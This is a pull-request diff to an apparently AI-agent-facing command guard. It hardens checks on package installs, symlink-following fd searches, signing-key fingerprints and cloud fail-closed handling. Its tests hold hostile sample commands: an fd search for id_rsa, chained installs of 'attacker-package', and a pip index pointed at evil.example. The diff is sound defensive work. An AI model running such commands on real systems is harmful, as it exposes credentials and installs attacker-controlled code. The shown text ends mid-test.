### PR TITLE
fix(guard): harden package firewall checks

### DIFF
--- a/src/codex_plugin_scanner/guard/cli/commands.py
+++ b/src/codex_plugin_scanner/guard/cli/commands.py
@@ -141,6 +141,7 @@ from ..runtime.false_positive_rules import (
     SOURCE_INSPECTION_PARTS,
     SOURCE_INSPECTION_SENSITIVE_PARTS,
     fd_arg_requests_exec,
+    fd_args_follow_symlinks,
     fd_exec_token_is_plain_sed,
     fd_search_targets,
     split_fd_args_and_exec,
@@ -7700,6 +7701,8 @@ def _codex_search_targets_are_source_like(
 
 
 def _codex_fd_targets_are_source_like(args: list[str], *, cwd: Path | None, home_dir: Path | None) -> bool:
+    if fd_args_follow_symlinks(args):
+        return False
     targets = _codex_fd_targets(args)
     if not targets:
         return False
@@ -7711,6 +7714,8 @@ def _codex_fd_targets(args: list[str]) -> tuple[str, ...]:
 
 
 def _codex_fd_exec_is_bounded_read_only(args: list[str]) -> bool:
+    if fd_args_follow_symlinks(args):
+        return False
     parsed = split_fd_args_and_exec(args)
     if parsed is None:
         return not any(fd_arg_requests_exec(arg) for arg in args)

--- a/src/codex_plugin_scanner/guard/runtime/false_positive_rules.py
+++ b/src/codex_plugin_scanner/guard/runtime/false_positive_rules.py
@@ -175,7 +175,7 @@ def fd_args_follow_symlinks(args: list[str]) -> bool:
             continue
         cluster = arg[1:]
         for flag in cluster:
-            if flag in {"d", "E", "e", "j", "o", "S", "t"}:
+            if flag in {"c", "d", "E", "e", "j", "o", "S", "t", "x", "X"}:
                 break
             if flag == "L":
                 return True

--- a/src/codex_plugin_scanner/guard/runtime/false_positive_rules.py
+++ b/src/codex_plugin_scanner/guard/runtime/false_positive_rules.py
@@ -159,6 +159,29 @@ def fd_arg_requests_exec(arg: str) -> bool:
     return False
 
 
+def fd_args_follow_symlinks(args: list[str]) -> bool:
+    after_options = False
+    for arg in args:
+        if after_options:
+            continue
+        if arg == "--":
+            after_options = True
+            continue
+        if arg == "--follow":
+            return True
+        if arg.startswith("--"):
+            continue
+        if not arg.startswith("-") or arg == "-":
+            continue
+        cluster = arg[1:]
+        for flag in cluster:
+            if flag in {"d", "E", "e", "j", "o", "S", "t"}:
+                break
+            if flag == "L":
+                return True
+    return False
+
+
 def split_fd_args_and_exec(args: list[str]) -> tuple[list[str], list[str]] | None:
     for index, arg in enumerate(args):
         if arg == "-X" or arg.startswith("-X") or arg == "--exec-batch" or arg.startswith(("--exec=", "--exec-batch=")):
@@ -447,6 +470,12 @@ def classify_source_search_command(command: str) -> SourceSearchClassification:
         return SourceSearchClassification(
             is_source_search=False,
             reason="find with mutating action flag",
+            tool=tool,
+        )
+    if tool == "fd" and fd_args_follow_symlinks(parts[1:]):
+        return SourceSearchClassification(
+            is_source_search=False,
+            reason="fd follows symlinks",
             tool=tool,
         )
 

--- a/src/codex_plugin_scanner/guard/runtime/package_intent_parser.py
+++ b/src/codex_plugin_scanner/guard/runtime/package_intent_parser.py
@@ -4,12 +4,13 @@ from __future__ import annotations
 
 import re
 import shlex
-from dataclasses import replace
+from dataclasses import dataclass, replace
 from pathlib import Path
 
 from ..protect import _collect_package_specs
 from .mcp_protection import _command_name, _package_token
 from .package_intent_common import (
+    IntentKind,
     PackageIntent,
     PackageIntentTarget,
     composer_target,
@@ -26,16 +27,31 @@ from .package_intent_common import (
 )
 from .secret_file_requests import _SHELL_TOOL_NAMES, _candidate_command_texts, _normalize_tool_name
 
-_CONTROL_TOKENS = {"&&", "||", ";", "|", "|&"}
+_CONTROL_TOKENS = {"&&", "||", ";", "|", "|&", "&"}
 _ENV_ASSIGNMENT_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=.*$")
 _PYTHON_EXECUTABLES = {"py", "python", "python3", "python3.11", "python3.12", "python3.13", "python3.14"}
+_PACKAGE_SOURCE_ENV_NAMES = frozenset(
+    {
+        "PIP_EXTRA_INDEX_URL",
+        "PIP_INDEX_URL",
+        "PIP_FIND_LINKS",
+        "UV_DEFAULT_INDEX",
+        "UV_EXTRA_INDEX_URL",
+        "UV_INDEX",
+        "UV_INDEX_URL",
+        "NPM_CONFIG_REGISTRY",
+        "YARN_NPM_REGISTRY_SERVER",
+    }
+)
+
+
+@dataclass(frozen=True, slots=True)
+class _CommandSegment:
+    tokens: tuple[str, ...]
+    redacted_tokens: tuple[str, ...]
 
 
 def parse_package_intent(command_text: str, *, workspace: Path | None = None) -> PackageIntent | None:
-    command_tokens = _normalized_command_tokens(command_text)
-    if not command_tokens:
-        return None
-    command_name = _command_name(command_tokens[0])
     handlers = {
         "npm": _parse_npm_intent,
         "npx": _parse_exec_intent,
@@ -69,13 +85,18 @@ def parse_package_intent(command_text: str, *, workspace: Path | None = None) ->
         "zypper": _parse_system_package_intent,
         "helm": _parse_helm_intent,
     }
-    handler = handlers.get(command_name)
-    if handler is None:
-        return None
-    intent = handler(command_tokens, workspace=workspace)
-    if intent is None:
-        return None
-    return replace(intent, redacted_command=_redacted_command_text(command_text))
+    intents: list[PackageIntent] = []
+    for segment in _normalized_command_segments(command_text):
+        if not segment.tokens:
+            continue
+        command_name = _command_name(segment.tokens[0])
+        handler = handlers.get(command_name)
+        if handler is None:
+            continue
+        intent = handler(segment.tokens, workspace=workspace)
+        if intent is not None:
+            intents.append(replace(intent, redacted_command=redacted_command(segment.redacted_tokens)))
+    return _combine_package_intents(tuple(intents))
 
 
 def extract_package_intent_request(
@@ -575,41 +596,79 @@ def _exec_package_spec(tokens: tuple[str, ...]) -> str | None:
 
 
 def _normalized_command_tokens(command_text: str) -> tuple[str, ...]:
+    segments = _normalized_command_segments(command_text)
+    return segments[0].tokens if segments else ()
+
+
+def _normalized_command_segments(command_text: str) -> tuple[_CommandSegment, ...]:
     try:
-        tokens = shlex.split(command_text, posix=True)
+        tokens = _split_shell_tokens(command_text)
     except ValueError:
         return ()
+    segments: list[_CommandSegment] = []
+    for raw_segment in _raw_command_segments(tokens):
+        normalized_tokens = _normalize_segment(raw_segment)
+        if not normalized_tokens:
+            continue
+        redacted_tokens = _redacted_segment(raw_segment)
+        segments.append(_CommandSegment(tuple(normalized_tokens), tuple(redacted_tokens)))
+    return tuple(segments)
+
+
+def _raw_command_segments(tokens: list[str]) -> tuple[list[str], ...]:
+    segments: list[list[str]] = []
     segment: list[str] = []
     for token in tokens:
         if token in _CONTROL_TOKENS:
-            break
+            if segment:
+                segments.append(segment)
+            segment = []
+            continue
         segment.append(token)
-    segment = _strip_wrapper_tokens(segment)
+    if segment:
+        segments.append(segment)
+    return tuple(segments)
+
+
+def _normalize_segment(raw_segment: list[str]) -> list[str]:
+    segment = _strip_wrapper_tokens(list(raw_segment))
     if len(segment) >= 3 and _command_name(segment[0]) in _PYTHON_EXECUTABLES and segment[1] == "-m":
         segment = [segment[2], *segment[3:]]
-    return tuple(segment)
+    return segment
 
 
 def _redacted_command_text(command_text: str) -> str:
     try:
-        tokens = shlex.split(command_text, posix=True)
+        tokens = _split_shell_tokens(command_text)
     except ValueError:
         return ""
-    segment: list[str] = []
-    for token in tokens:
-        if token in _CONTROL_TOKENS:
-            break
-        segment.append(token)
-    segment = _strip_redaction_wrappers(segment)
-    if len(segment) >= 3 and _command_name(segment[0]) in _PYTHON_EXECUTABLES and segment[1] == "-m":
-        segment = [segment[2], *segment[3:]]
-    segment = _redact_local_source_tokens(segment)
+    raw_segments = _raw_command_segments(tokens)
+    if not raw_segments:
+        return ""
+    segment = _redacted_segment(raw_segments[0])
     return redacted_command(tuple(segment))
 
 
+def _redacted_segment(raw_segment: list[str]) -> list[str]:
+    segment = _strip_redaction_wrappers(list(raw_segment))
+    if len(segment) >= 3 and _command_name(segment[0]) in _PYTHON_EXECUTABLES and segment[1] == "-m":
+        segment = [segment[2], *segment[3:]]
+    return _redact_local_source_tokens(segment)
+
+
+def _split_shell_tokens(command_text: str) -> list[str]:
+    lexer = shlex.shlex(command_text, posix=True, punctuation_chars=";&|")
+    lexer.whitespace_split = True
+    lexer.commenters = ""
+    return list(lexer)
+
+
 def _strip_redaction_wrappers(segment: list[str]) -> list[str]:
+    preserved_env: list[str] = []
     while segment:
         if _ENV_ASSIGNMENT_RE.match(segment[0]):
+            if _package_source_env_assignment(segment[0]):
+                preserved_env.append(segment[0])
             segment.pop(0)
             continue
         command_name = _command_name(segment[0])
@@ -617,13 +676,73 @@ def _strip_redaction_wrappers(segment: list[str]) -> list[str]:
             segment = _strip_sudo_prefix(segment[1:])
             continue
         if command_name == "env":
-            segment = _strip_env_prefix(segment[1:])
+            env_preserved, segment = _strip_env_prefix_for_redaction(segment[1:])
+            preserved_env.extend(env_preserved)
             continue
         if command_name in {"command", "time"}:
             segment = _strip_plain_wrapper_flags(segment[1:])
             continue
         break
-    return segment
+    return [*preserved_env, *segment]
+
+
+def _combine_package_intents(intents: tuple[PackageIntent, ...]) -> PackageIntent | None:
+    if not intents:
+        return None
+    if len(intents) == 1:
+        return intents[0]
+    return PackageIntent(
+        package_manager=_combined_package_manager(intents),
+        intent_kind=_combined_intent_kind(intents),
+        command_tokens=_unique_joined_tokens(intent.command_tokens for intent in intents),
+        redacted_command=" ; ".join(intent.redacted_command for intent in intents if intent.redacted_command),
+        targets=tuple(target for intent in intents for target in intent.targets),
+        manifest_paths=_unique_joined_strings(intent.manifest_paths for intent in intents),
+        lockfile_paths=_unique_joined_strings(intent.lockfile_paths for intent in intents),
+        flags=_unique_joined_strings(intent.flags for intent in intents),
+        notes=_unique_joined_strings((*[intent.notes for intent in intents], ("multiple-package-segments",))),
+    )
+
+
+def _combined_package_manager(intents: tuple[PackageIntent, ...]) -> str:
+    managers = {intent.package_manager for intent in intents}
+    if len(managers) == 1:
+        return intents[0].package_manager
+    return "multiple"
+
+
+def _combined_intent_kind(intents: tuple[PackageIntent, ...]) -> IntentKind:
+    kinds = {intent.intent_kind for intent in intents}
+    if len(kinds) == 1:
+        return intents[0].intent_kind
+    if "install" in kinds:
+        return "install"
+    if "execute" in kinds:
+        return "execute"
+    return "sync"
+
+
+def _unique_joined_tokens(groups: object) -> tuple[str, ...]:
+    tokens: list[str] = []
+    for group in groups:
+        if tokens:
+            tokens.append(";")
+        tokens.extend(str(token) for token in group)
+    return tuple(tokens)
+
+
+def _unique_joined_strings(groups: object) -> tuple[str, ...]:
+    values: list[str] = []
+    for group in groups:
+        for value in group:
+            if value not in values:
+                values.append(value)
+    return tuple(values)
+
+
+def _package_source_env_assignment(token: str) -> bool:
+    name, separator, value = token.partition("=")
+    return bool(separator and value and name.upper() in _PACKAGE_SOURCE_ENV_NAMES)
 
 
 def _strip_wrapper_tokens(segment: list[str]) -> list[str]:
@@ -695,6 +814,25 @@ def _strip_env_prefix(tokens: list[str]) -> list[str]:
             continue
         index += 1
     return tokens[index:]
+
+
+def _strip_env_prefix_for_redaction(tokens: list[str]) -> tuple[list[str], list[str]]:
+    preserved_env: list[str] = []
+    index = 0
+    while index < len(tokens):
+        token = tokens[index]
+        if _ENV_ASSIGNMENT_RE.match(token):
+            if _package_source_env_assignment(token):
+                preserved_env.append(token)
+            index += 1
+            continue
+        if not token.startswith("-"):
+            break
+        if token in {"-u", "-C", "-S"} and index + 1 < len(tokens):
+            index += 2
+            continue
+        index += 1
+    return preserved_env, tokens[index:]
 
 
 def _strip_plain_wrapper_flags(tokens: list[str]) -> list[str]:

--- a/src/codex_plugin_scanner/guard/runtime/package_intent_parser.py
+++ b/src/codex_plugin_scanner/guard/runtime/package_intent_parser.py
@@ -4,6 +4,7 @@ from __future__ import annotations
 
 import re
 import shlex
+from collections.abc import Iterable
 from dataclasses import dataclass, replace
 from pathlib import Path
 
@@ -722,7 +723,7 @@ def _combined_intent_kind(intents: tuple[PackageIntent, ...]) -> IntentKind:
     return "sync"
 
 
-def _unique_joined_tokens(groups: object) -> tuple[str, ...]:
+def _unique_joined_tokens(groups: Iterable[Iterable[str]]) -> tuple[str, ...]:
     tokens: list[str] = []
     for group in groups:
         if tokens:
@@ -731,7 +732,7 @@ def _unique_joined_tokens(groups: object) -> tuple[str, ...]:
     return tuple(tokens)
 
 
-def _unique_joined_strings(groups: object) -> tuple[str, ...]:
+def _unique_joined_strings(groups: Iterable[Iterable[str]]) -> tuple[str, ...]:
     values: list[str] = []
     for group in groups:
         for value in group:

--- a/src/codex_plugin_scanner/guard/runtime/secret_file_requests.py
+++ b/src/codex_plugin_scanner/guard/runtime/secret_file_requests.py
@@ -23,6 +23,7 @@ from .false_positive_rules import (
     SOURCE_INSPECTION_PARTS,
     SOURCE_INSPECTION_SENSITIVE_PARTS,
     fd_arg_requests_exec,
+    fd_args_follow_symlinks,
     fd_exec_token_is_plain_sed,
     fd_search_targets,
     split_fd_args_and_exec,
@@ -4008,6 +4009,8 @@ def _read_only_lookup_search_args_are_safe(args: list[str], *, home_dir: Path | 
 
 
 def _read_only_lookup_fd_args_are_safe(args: list[str], *, home_dir: Path | None = None) -> bool:
+    if fd_args_follow_symlinks(args):
+        return False
     if any(fd_arg_requests_exec(arg) for arg in args):
         return _fd_exec_sed_read_only_args_are_safe(args, home_dir=home_dir)
     targets = fd_search_targets(args)
@@ -4019,6 +4022,8 @@ def _read_only_lookup_fd_args_are_safe(args: list[str], *, home_dir: Path | None
 
 
 def _fd_exec_sed_read_only_args_are_safe(args: list[str], *, home_dir: Path | None = None) -> bool:
+    if fd_args_follow_symlinks(args):
+        return False
     parsed = split_fd_args_and_exec(args)
     if parsed is None:
         return False

--- a/src/codex_plugin_scanner/guard/runtime/supply_chain_bundle_runtime.py
+++ b/src/codex_plugin_scanner/guard/runtime/supply_chain_bundle_runtime.py
@@ -128,12 +128,22 @@ def check_supply_chain_bundle_rollback(bundle: SupplyChainBundle, cached_bundle_
         )
 
 
-def _response_keyring_is_anchored(
-    response: SupplyChainBundleResponse,
+def _computed_key_fingerprint(key: SupplyChainVerificationKey) -> str:
+    return hashlib.sha256(key.public_key_pem.strip().encode("utf-8")).hexdigest()
+
+
+def _validate_key_fingerprints(response: SupplyChainBundleResponse) -> None:
+    for key in response.verification_keys:
+        if key.fingerprint_sha256 != _computed_key_fingerprint(key):
+            raise SupplyChainBundleKeyringError("Verification key fingerprint does not match its public key")
+
+
+def _signing_key_is_trusted(
+    signing_key: SupplyChainVerificationKey,
     trusted_keys: tuple[SupplyChainVerificationKey, ...],
 ) -> bool:
     trusted_fingerprints = {item.fingerprint_sha256 for item in trusted_keys}
-    return any(item.fingerprint_sha256 in trusted_fingerprints for item in response.verification_keys)
+    return signing_key.fingerprint_sha256 in trusted_fingerprints
 
 
 def verify_supply_chain_bundle_response(
@@ -157,8 +167,9 @@ def verify_supply_chain_bundle_response(
     )
     if signing_key is None:
         raise SupplyChainBundleKeyringError("Bundle keyId is not present in the advertised verification keyring")
-    if trusted_keys and not _response_keyring_is_anchored(response, trusted_keys):
-        raise SupplyChainBundleKeyringError("Bundle verification keyring is not anchored to the trusted keyring")
+    _validate_key_fingerprints(response)
+    if trusted_keys and not _signing_key_is_trusted(signing_key, trusted_keys):
+        raise SupplyChainBundleKeyringError("Bundle signing key is not anchored to the trusted keyring")
     current_time = now if now is not None else time.time()
     if signing_key.state == "revoked":
         raise SupplyChainBundleKeyringError("Revoked verification key cannot sign supply-chain bundles")

--- a/src/codex_plugin_scanner/guard/runtime/supply_chain_bundle_runtime.py
+++ b/src/codex_plugin_scanner/guard/runtime/supply_chain_bundle_runtime.py
@@ -129,7 +129,8 @@ def check_supply_chain_bundle_rollback(bundle: SupplyChainBundle, cached_bundle_
 
 
 def _computed_key_fingerprint(key: SupplyChainVerificationKey) -> str:
-    return hashlib.sha256(key.public_key_pem.strip().encode("utf-8")).hexdigest()
+    normalized_pem = key.public_key_pem.replace("\r\n", "\n").strip()
+    return hashlib.sha256(normalized_pem.encode("utf-8")).hexdigest()
 
 
 def _validate_key_fingerprints(response: SupplyChainBundleResponse) -> None:

--- a/src/codex_plugin_scanner/guard/runtime/supply_chain_package_eval.py
+++ b/src/codex_plugin_scanner/guard/runtime/supply_chain_package_eval.py
@@ -365,7 +365,7 @@ def _artifact_has_package_material(artifact: GuardArtifact, targets: tuple[dict[
 
 
 def _has_non_empty_string_item(value: object) -> bool:
-    if not isinstance(value, list):
+    if not isinstance(value, (list, tuple)):
         return False
     return any(isinstance(item, str) and item for item in value)
 
@@ -396,8 +396,8 @@ def _empty_package_material_result(
         exception_id=None,
         refresh_required=False,
         record_monitor_evidence=False,
-        bundle_version=bundle_meta["bundle_version"] if bundle_meta is not None else None,
-        policy_version=bundle_meta["policy_hash"] if bundle_meta is not None else "local:none",
+        bundle_version=bundle_meta.get("bundle_version") if bundle_meta is not None else None,
+        policy_version=bundle_meta.get("policy_hash", "local:none") if bundle_meta is not None else "local:none",
     )
     return _finalize_evaluation(
         draft,
@@ -741,8 +741,8 @@ def _cloud_fail_closed_evaluation(
         exception_id=None,
         refresh_required=False,
         record_monitor_evidence=False,
-        bundle_version=bundle_meta["bundle_version"] if bundle_meta is not None else None,
-        policy_version=bundle_meta["policy_hash"] if bundle_meta is not None else "local:none",
+        bundle_version=bundle_meta.get("bundle_version") if bundle_meta is not None else None,
+        policy_version=bundle_meta.get("policy_hash", "local:none") if bundle_meta is not None else "local:none",
     )
     return _finalize_evaluation(
         draft,

--- a/src/codex_plugin_scanner/guard/runtime/supply_chain_package_eval.py
+++ b/src/codex_plugin_scanner/guard/runtime/supply_chain_package_eval.py
@@ -259,6 +259,16 @@ def evaluate_package_request_artifact(
         _persist_evidence(store=store, artifact=artifact, evaluation=fallback, now=now_value)
         store.add_event("supply_chain_bundle_refresh_requested", {"artifact_id": artifact.artifact_id}, now_value)
         return fallback
+    if not _artifact_has_package_material(artifact, targets):
+        no_material_result = _empty_package_material_result(
+            artifact=artifact,
+            workspace_id=workspace_id,
+            bundle_meta=bundle_meta,
+            package_intent_hash=package_intent_hash,
+            workspace_fingerprint=workspace_fingerprint,
+        )
+        _persist_evidence(store=store, artifact=artifact, evaluation=no_material_result, now=now_value)
+        return no_material_result
     cloud_result, cloud_fallback_reason = _evaluate_with_cloud(
         artifact=artifact,
         targets=targets,
@@ -344,6 +354,56 @@ def evaluate_package_request_artifact(
         result = _with_additional_reason(result, cloud_fallback_reason)
     _persist_evidence(store=store, artifact=artifact, evaluation=result, now=now_value)
     return result
+
+
+def _artifact_has_package_material(artifact: GuardArtifact, targets: tuple[dict[str, object], ...]) -> bool:
+    if targets:
+        return True
+    return _has_non_empty_string_item(artifact.metadata.get("manifest_paths")) or _has_non_empty_string_item(
+        artifact.metadata.get("lockfile_paths")
+    )
+
+
+def _has_non_empty_string_item(value: object) -> bool:
+    if not isinstance(value, list):
+        return False
+    return any(isinstance(item, str) and item for item in value)
+
+
+def _empty_package_material_result(
+    *,
+    artifact: GuardArtifact,
+    workspace_id: str | None,
+    bundle_meta: dict[str, str] | None,
+    package_intent_hash: str,
+    workspace_fingerprint: str | None,
+) -> PackageRequestEvaluation:
+    draft = _EvaluationDraft(
+        decision="monitor",
+        enforcement="free_local" if workspace_id is None else "local_fallback",
+        entitlement_state="free" if workspace_id is None else "premium",
+        cache_status="empty",
+        packages=(),
+        reasons=(
+            {
+                "code": "no_package_material",
+                "message": "Guard found no package targets, manifests, or lockfiles to evaluate for this request.",
+                "severity": "unknown",
+                "source": "guard-local",
+            },
+        ),
+        matched_rule_id=None,
+        exception_id=None,
+        refresh_required=False,
+        record_monitor_evidence=False,
+        bundle_version=bundle_meta["bundle_version"] if bundle_meta is not None else None,
+        policy_version=bundle_meta["policy_hash"] if bundle_meta is not None else "local:none",
+    )
+    return _finalize_evaluation(
+        draft,
+        package_intent_hash=package_intent_hash,
+        workspace_fingerprint=workspace_fingerprint,
+    )
 
 
 @dataclass(frozen=True, slots=True)
@@ -498,6 +558,16 @@ def _evaluate_with_cloud(
             retry_timeout_seconds=_RETRY_TIMEOUT_SECONDS,
         )
     except urllib.error.HTTPError as error:
+        fail_closed = _cloud_http_fail_closed_evaluation(
+            status_code=error.code,
+            artifact=artifact,
+            targets=targets,
+            workspace_dir=workspace_dir,
+            workspace_fingerprint=workspace_fingerprint,
+            bundle_meta=bundle_meta,
+        )
+        if fail_closed is not None:
+            return fail_closed, None
         return None, _cloud_fallback_reason(
             code="cloud_http_error",
             message=(f"Guard cloud evaluation returned HTTP {error.code}, so Guard fell back to local intelligence."),
@@ -507,20 +577,46 @@ def _evaluate_with_cloud(
             code="cloud_timeout",
             message="Guard cloud evaluation timed out, so Guard fell back to local intelligence.",
         )
-    except ValueError:
-        return None, _cloud_fallback_reason(
-            code="cloud_invalid_response",
-            message="Guard cloud evaluation returned an invalid response, so Guard fell back locally.",
+    except (RuntimeError, ValueError):
+        return (
+            _cloud_fail_closed_evaluation(
+                code="cloud_validation_error",
+                message="Guard cloud evaluation returned an invalid response, so this package request needs review.",
+                artifact=artifact,
+                targets=targets,
+                workspace_dir=workspace_dir,
+                workspace_fingerprint=workspace_fingerprint,
+                bundle_meta=bundle_meta,
+            ),
+            None,
         )
     if not isinstance(response_payload, dict):
-        return None, _cloud_fallback_reason(
-            code="cloud_invalid_response",
-            message="Guard cloud evaluation returned an invalid response, so Guard fell back locally.",
+        return (
+            _cloud_fail_closed_evaluation(
+                code="cloud_validation_error",
+                message="Guard cloud evaluation returned an invalid response, so this package request needs review.",
+                artifact=artifact,
+                targets=targets,
+                workspace_dir=workspace_dir,
+                workspace_fingerprint=workspace_fingerprint,
+                bundle_meta=bundle_meta,
+            ),
+            None,
         )
     if not isinstance(response_payload.get("packages"), list):
-        return None, _cloud_fallback_reason(
-            code="cloud_invalid_response",
-            message="Guard cloud evaluation returned an invalid package payload, so Guard fell back locally.",
+        return (
+            _cloud_fail_closed_evaluation(
+                code="cloud_validation_error",
+                message=(
+                    "Guard cloud evaluation returned an invalid package payload, so this package request needs review."
+                ),
+                artifact=artifact,
+                targets=targets,
+                workspace_dir=workspace_dir,
+                workspace_fingerprint=workspace_fingerprint,
+                bundle_meta=bundle_meta,
+            ),
+            None,
         )
     packages = tuple(
         _package_from_cloud_result(item) for item in response_payload["packages"] if isinstance(item, dict)
@@ -570,6 +666,89 @@ def _evaluate_with_cloud(
                 ),
             )
     return evaluation, None
+
+
+def _cloud_http_fail_closed_evaluation(
+    *,
+    status_code: int,
+    artifact: GuardArtifact,
+    targets: tuple[dict[str, object], ...],
+    workspace_dir: Path | None,
+    workspace_fingerprint: str | None,
+    bundle_meta: dict[str, str] | None,
+) -> PackageRequestEvaluation | None:
+    if status_code in {401, 403}:
+        return _cloud_fail_closed_evaluation(
+            code="cloud_auth_error",
+            message="Guard cloud evaluation was not authorized, so this package request needs review.",
+            artifact=artifact,
+            targets=targets,
+            workspace_dir=workspace_dir,
+            workspace_fingerprint=workspace_fingerprint,
+            bundle_meta=bundle_meta,
+        )
+    if status_code in {400, 404}:
+        return _cloud_fail_closed_evaluation(
+            code="cloud_validation_error",
+            message="Guard cloud evaluation could not validate this request, so it needs review.",
+            artifact=artifact,
+            targets=targets,
+            workspace_dir=workspace_dir,
+            workspace_fingerprint=workspace_fingerprint,
+            bundle_meta=bundle_meta,
+        )
+    return None
+
+
+def _cloud_fail_closed_evaluation(
+    *,
+    code: str,
+    message: str,
+    artifact: GuardArtifact,
+    targets: tuple[dict[str, object], ...],
+    workspace_dir: Path | None,
+    workspace_fingerprint: str | None,
+    bundle_meta: dict[str, str] | None,
+) -> PackageRequestEvaluation:
+    reason = _cloud_fallback_reason(code=code, message=message)
+    packages = tuple(
+        _heuristic_package_result(
+            target=target,
+            decision="ask",
+            code=code,
+            message=message,
+            severity="high",
+        )
+        for target in targets
+    )
+    if not packages:
+        packages = tuple(
+            {
+                **package,
+                "decision": "ask",
+                "reasons": (reason,),
+            }
+            for package in _fallback_monitor_packages(targets=targets, artifact=artifact, workspace_dir=workspace_dir)
+        )
+    draft = _EvaluationDraft(
+        decision="ask",
+        enforcement="premium_cloud",
+        entitlement_state="premium",
+        cache_status="cloud-error",
+        packages=packages,
+        reasons=(reason,),
+        matched_rule_id=None,
+        exception_id=None,
+        refresh_required=False,
+        record_monitor_evidence=False,
+        bundle_version=bundle_meta["bundle_version"] if bundle_meta is not None else None,
+        policy_version=bundle_meta["policy_hash"] if bundle_meta is not None else "local:none",
+    )
+    return _finalize_evaluation(
+        draft,
+        package_intent_hash=artifact.artifact_id.rsplit(":", 1)[-1],
+        workspace_fingerprint=workspace_fingerprint,
+    )
 
 
 def _evaluate_with_bundle(
@@ -2698,13 +2877,13 @@ def _lockfile_parse_warning_result(
             continue
         return _heuristic_package_result(
             target=target,
-            decision="monitor",
+            decision="ask",
             code="lockfile_parse_error",
             message=(
-                "Guard could not parse the existing lockfile and fell back to monitor-only "
-                "coverage. Repair the lockfile, then retry."
+                "Guard could not parse the existing lockfile, so this range-based package request needs review. "
+                "Repair the lockfile, then retry."
             ),
-            severity="low",
+            severity="high",
         )
     return None
 

--- a/tests/test_guard_detector_fp.py
+++ b/tests/test_guard_detector_fp.py
@@ -55,6 +55,9 @@ class TestSourceSearchClassifier:
         assert fd_args_follow_symlinks(["-L", "id_rsa", "src"]) is True
         assert fd_args_follow_symlinks(["--follow", "id_rsa", "src"]) is True
         assert fd_args_follow_symlinks(["-HI", "SKILL.md", "src"]) is False
+        assert fd_args_follow_symlinks(["-xL", "cat"]) is False
+        assert fd_args_follow_symlinks(["-XL", "cat"]) is False
+        assert fd_args_follow_symlinks(["-cL", "always"]) is False
         assert result.is_source_search is False
 
     def test_find_source_dirs_is_source_search(self) -> None:

--- a/tests/test_guard_detector_fp.py
+++ b/tests/test_guard_detector_fp.py
@@ -21,6 +21,7 @@ from codex_plugin_scanner.guard.runtime.false_positive_rules import (
     classify_package_metadata_access,
     classify_source_search_command,
     classify_version_file_access,
+    fd_args_follow_symlinks,
 )
 from codex_plugin_scanner.guard.runtime.persistence_rules import detect_persistence_mechanisms
 
@@ -47,6 +48,14 @@ class TestSourceSearchClassifier:
     def test_fd_find_config_files_is_source_search(self) -> None:
         result = classify_source_search_command("fd -e ts -e js --type f .")
         assert result.is_source_search is True
+
+    def test_fd_follow_symlink_search_is_not_source_search(self) -> None:
+        result = classify_source_search_command("fd -L 'id_rsa' src -x sed -n '1,20p' {}")
+
+        assert fd_args_follow_symlinks(["-L", "id_rsa", "src"]) is True
+        assert fd_args_follow_symlinks(["--follow", "id_rsa", "src"]) is True
+        assert fd_args_follow_symlinks(["-HI", "SKILL.md", "src"]) is False
+        assert result.is_source_search is False
 
     def test_find_source_dirs_is_source_search(self) -> None:
         result = classify_source_search_command("find src/ -name '*.py' -type f")

--- a/tests/test_guard_package_intent.py
+++ b/tests/test_guard_package_intent.py
@@ -102,6 +102,37 @@ def test_parse_package_intent_exec_commands_are_classified_as_execute_requests()
         assert intent.targets[0].requested_specifier == requested_specifier
 
 
+def test_parse_package_intent_detects_package_command_after_control_operator() -> None:
+    commands = {
+        "true && npx attacker-package": ("npx", "attacker-package"),
+        "echo ok; npm install attacker-package": ("npm", "attacker-package"),
+        "false || pnpm dlx attacker-package": ("pnpm", "attacker-package"),
+        "echo ok | bunx attacker-package": ("bunx", "attacker-package"),
+        "echo ok & pip install attacker-package": ("pip", "attacker-package"),
+    }
+
+    for command, (manager, package_name) in commands.items():
+        intent = parse_package_intent(command)
+
+        assert intent is not None
+        assert intent.package_manager == manager
+        assert intent.targets[0].package_name == package_name
+
+    assert parse_package_intent("echo safe && grep foo src/file.ts") is None
+
+
+def test_parse_package_intent_combines_multiple_package_segments() -> None:
+    intent = parse_package_intent("npm install left-pad && npm install attacker-package@1.0.0")
+
+    assert intent is not None
+    assert intent.package_manager == "npm"
+    assert intent.intent_kind == "install"
+    assert [target.package_name for target in intent.targets] == ["left-pad", "attacker-package"]
+    assert [target.requested_specifier for target in intent.targets] == [None, "1.0.0"]
+    assert "left-pad" in intent.redacted_command
+    assert "attacker-package@1.0.0" in intent.redacted_command
+
+
 def test_parse_package_intent_npm_exec_prefers_explicit_package_when_command_differs() -> None:
     intent = parse_package_intent("npm exec --package cowsay hello")
 

--- a/tests/test_guard_python_package_intent_phase12.py
+++ b/tests/test_guard_python_package_intent_phase12.py
@@ -6,6 +6,7 @@ from codex_plugin_scanner.guard.runtime.package_intent import (
     parse_manifest_dependency_changes,
     parse_package_intent,
 )
+from codex_plugin_scanner.guard.runtime.package_intent_common import build_package_request_artifact
 
 
 def _change_map(path: str, before_text: str, after_text: str) -> dict[str, tuple[str | None, str | None]]:
@@ -170,11 +171,55 @@ def test_parse_package_intent_redacts_pip_index_credentials_from_flag_values() -
 
 def test_parse_package_intent_redacts_pip_index_credentials_from_env_assignments() -> None:
     intent = parse_package_intent("PIP_INDEX_URL=https://user:secret@example.com/simple pip install requests==2.31.0")
+    wrapped_intent = parse_package_intent(
+        "env PIP_INDEX_URL=https://user:secret@example.com/simple pip install requests==2.31.0"
+    )
 
     assert intent is not None
     assert "user:secret@" not in intent.redacted_command
-    assert "PIP_INDEX_URL" not in intent.redacted_command
-    assert intent.redacted_command == "pip install requests==2.31.0"
+    assert "PIP_INDEX_URL=https://example.com/simple" in intent.redacted_command
+    assert intent.redacted_command.endswith("pip install requests==2.31.0")
+    assert wrapped_intent is not None
+    assert "user:secret@" not in wrapped_intent.redacted_command
+    assert "PIP_INDEX_URL=https://example.com/simple" in wrapped_intent.redacted_command
+    assert wrapped_intent.redacted_command.endswith("pip install requests==2.31.0")
+
+
+def test_parse_package_intent_package_source_env_changes_fingerprint() -> None:
+    benign_intent = parse_package_intent("pip install requests==2.31.0")
+    source_intent = parse_package_intent(
+        "PIP_INDEX_URL=https://user:secret@evil.example/simple pip install requests==2.31.0"
+    )
+    unrelated_env_intent = parse_package_intent("API_TOKEN=supersecret pip install requests==2.31.0")
+
+    assert benign_intent is not None
+    assert source_intent is not None
